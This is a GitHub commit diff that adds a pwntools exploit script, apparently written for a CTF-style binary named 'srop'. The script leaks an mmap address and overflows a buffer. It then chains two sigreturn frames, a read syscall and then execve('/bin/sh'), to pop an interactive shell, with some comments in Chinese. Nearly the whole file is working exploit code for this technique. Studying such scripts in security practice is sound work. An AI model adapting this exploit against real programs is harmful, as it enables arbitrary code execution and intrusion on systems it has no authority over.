File tree 1 file changed +68
-0
lines changed
1 file changed +68
-0
lines changed Original file line number Diff line number Diff line change 1+ #!/usr/bin/env python3
2+ from pwn import *
3+
4+
5+ c = process ('./srop' )
6+ elf = ELF ('./srop' )
7+ context .arch = 'amd64'
8+ context .terminal = ['tmux' , 'splitw' , '-h' ]
9+ gdb .attach (c , 'init-gef' )
10+
11+ #context.log_level = 'debug'
12+
13+ """
14+ my_restore_rt: 0x401176
15+ new_mmap: 0x7fb5f370c010
16+ """
17+
18+ my_restore_rt = 0x4011be
19+ syscall_ret = 0x4011c7
20+ print (
21+ """
22+ b *0x4011be
23+ b *0x4011c7
24+ """ )
25+
26+ # 取得 leak 出的 mmap 的位置
27+ # drop first line
28+ c .recvuntil ('\n ' )
29+ new_mmap = c .recvuntil ('\n ' )[:- 1 ].decode ().strip ().split (' ' )[- 1 ]
30+ new_mmap = int (new_mmap , 16 )
31+ print (hex (my_restore_rt ), hex (new_mmap ), hex (syscall_ret ))
32+
33+ mmap1 = new_mmap + 0x2000
34+ mmap2 = mmap1 + 0x2000
35+
36+ stack = mmap2
37+ bin_sh = stack + 0x300
38+
39+ """
40+ 1. read "/bin/sh" to mmap1
41+ """
42+
43+ # 第一個 SROP 嘗試去讀入資料到 heap 中
44+ sigframe = SigreturnFrame ()
45+ sigframe .rax = constants .SYS_read
46+ sigframe .rdi = 0
47+ sigframe .rsi = stack
48+ sigframe .rdx = 0x1000
49+ sigframe .rip = syscall_ret
50+ sigframe .rsp = stack
51+
52+ payload = b'a' * 0x20 + b'rbpprbpp' + p64 (my_restore_rt ) + bytes (sigframe )
53+ c .send (payload )
54+
55+ # 第二個 SROP 嘗試去執行 execve
56+ execve_sigframe = SigreturnFrame ()
57+ execve_sigframe .rax = constants .SYS_execve
58+ execve_sigframe .rdi = bin_sh
59+ execve_sigframe .rsi = 0
60+ execve_sigframe .rdx = 0
61+ execve_sigframe .rsp = stack
62+ execve_sigframe .rip = syscall_ret
63+
64+ payload = flat ({0x0 : p64 (my_restore_rt ), 0x8 : bytes (execve_sigframe ), 0x300 : '/bin/sh\0 ' })
65+ c .sendafter ('done' , payload )
66+
67+ c .interactive ()
68+
You can’t perform that action at this time.
0 commit comments